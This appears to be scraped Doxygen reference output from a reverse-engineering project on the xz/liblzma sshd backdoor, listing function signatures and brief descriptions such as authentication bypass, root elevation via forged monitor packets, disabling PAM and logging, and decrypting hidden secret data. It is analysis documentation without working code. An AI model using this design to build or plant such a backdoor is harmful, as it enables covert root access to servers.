BOOL is_range_mapped(u8 *addr, u64 length, global_context_t *ctx)
verify if a memory range is mapped
CommandFlags1
Definition: xzre.h:1501
@ CMDF_SETLOGMASK
disable all logging by setting mask 0x80000000
Definition: xzre.h:1509
@ CMDF_NO_EXTENDED_SIZE
if set, the union size field must be 0
Definition: xzre.h:1517
@ CMDF_DISABLE_PAM
if set, disables PAM authentication
Definition: xzre.h:1513
@ CMDF_8BYTES
the data block contains 8 additional bytes
Definition: xzre.h:1505
CommandFlags1
Definition: xzre.h:1503
@ CMDF_SETLOGMASK
disable all logging by setting mask 0x80000000
Definition: xzre.h:1511
@ CMDF_NO_EXTENDED_SIZE
if set, the union size field must be 0
Definition: xzre.h:1519
@ CMDF_DISABLE_PAM
if set, disables PAM authentication
Definition: xzre.h:1515
@ CMDF_8BYTES
the data block contains 8 additional bytes
Definition: xzre.h:1507
uintptr_t backdoor_symbind64(Elf64_Sym *sym, unsigned int ndx, uptr *refcook, uptr *defcook, unsigned int flags, const char *symname)
the backdoored symbind64 installed in GLRO(dl_audit)
BOOL find_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA or MOV instruction with an immediate memory operand
EncodedStringId get_string_id(const char *string_begin, const char *string_end)
Get the.
BOOL main_elf_parse(main_elf_t *main_elf)
Parses the main executable from the provided structure. As part of the process the arguments and envi...
fake_lzma_allocator_t fake_lzma_allocator
special .data.rel.ro section that contains a fake lzma_allocator
struct elf_handles elf_handles_t
array of ELF handles
BOOL sshd_proxy_elevate(sshd_proxy_args_t *args, global_context_t *ctx)
forges a new MONITOR_REQ_KEYALLOWED packet, and injects it into the server to gain root privileges th...
void elf_find_string_references(elf_info_t *elf_info, string_references_t *refs)
parses the ELF rodata section, looking for strings and the instructions that reference them
u8 * elf_find_string_reference(elf_info_t *elf_info, EncodedStringId encoded_string_id, u8 *code_start, u8 *code_end)
finds an instruction that references the given string
BOOL x86_dasm(dasm_ctx_t *ctx, u8 *code_start, u8 *code_end)
disassembles the given x64 code
BOOL find_lea_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA instruction with an immediate memory operand
const backdoor_cpuid_reloc_consts_t cpuid_reloc_consts
special .rodata section that contains _cpuid() related GOT offsets
int sshd_get_host_keys_score_in_main(void *host_keys, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if main accesses host_keys or not
struct backdoor_data backdoor_data_t
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1299
struct backdoor_data backdoor_data_t
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1301
u8 * find_string_reference(u8 *code_start, u8 *code_end, const char *str)
finds an instruction that references the given string
BOOL secret_data_get_decrypted(u8 *output, global_context_t *ctx)
obtains a decrypted copy of the secret data
BOOL find_function_prologue(u8 *code_start, u8 *code_end, u8 **output, FuncFindType find_mode)
locates the function prologue
BOOL backdoor_init_stage2(elf_entry_ctx_t *ctx, u64 *caller_frame, void **cpuid_got_addr, backdoor_cpuid_reloc_consts_t *reloc_consts)
const u64 string_mask_data[238]
contains mask data for the encoded string radix tree
BOOL chacha_decrypt(u8 *in, int inl, u8 *key, u8 *iv, u8 *out, imported_funcs_t *funcs)
decrypts a buffer with chacha20
BOOL sshd_auth_bypass(auth_bypass_args_t *args, global_context_t *ctx)
BOOL sshd_patch_variables(BOOL skip_root_patch, BOOL disable_pam, BOOL replace_monitor_reqtype, int monitor_reqtype, global_context_t *global_ctx)
Patches the sshd configuration.
void _cpuid_gcc(unsigned int level, unsigned int *a, unsigned int *b, unsigned int *c, unsigned int *d)
actually calls cpuid instruction
BOOL secret_data_append_if_flags(secret_data_shift_cursor_t shift_cursor, unsigned operation_index, unsigned shift_count, int flags, u8 *code)
Calls secret_data_append_singleton, if flags are non-zero.
u32 resolver_call_count
counts the number of times the IFUNC resolver is called
int init_hook_functions(backdoor_hooks_ctx_t *funcs)
Initializes the structure with hooks-related data.
lzma_allocator * get_lzma_allocator()
gets the fake LZMA allocator, used for imports resolution the "opaque" field of the structure holds a...
CommandFlags3
Definition: xzre.h:1547
@ CMDF_SOCKET_NUM
5 bits used to store number of sockets (in cmd3)
Definition: xzre.h:1551
@ CMDF_MONITOR_REQ_VAL
6 bits used to store the monitor req / 2 (might be unused)
Definition: xzre.h:1555
CommandFlags3
Definition: xzre.h:1549
@ CMDF_SOCKET_NUM
5 bits used to store number of sockets (in cmd3)
Definition: xzre.h:1553
@ CMDF_MONITOR_REQ_VAL
6 bits used to store the monitor req / 2 (might be unused)
Definition: xzre.h:1557
ptrdiff_t init_elf_entry_ctx(elf_entry_ctx_t *ctx)
initialises the elf_entry_ctx_t
const u64 cpuid_random_symbol
a bogus global variable that is used by the backdoor to generate an extra symbol
int sshd_get_host_keys_score(void *host_keys, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if accesses host_keys or not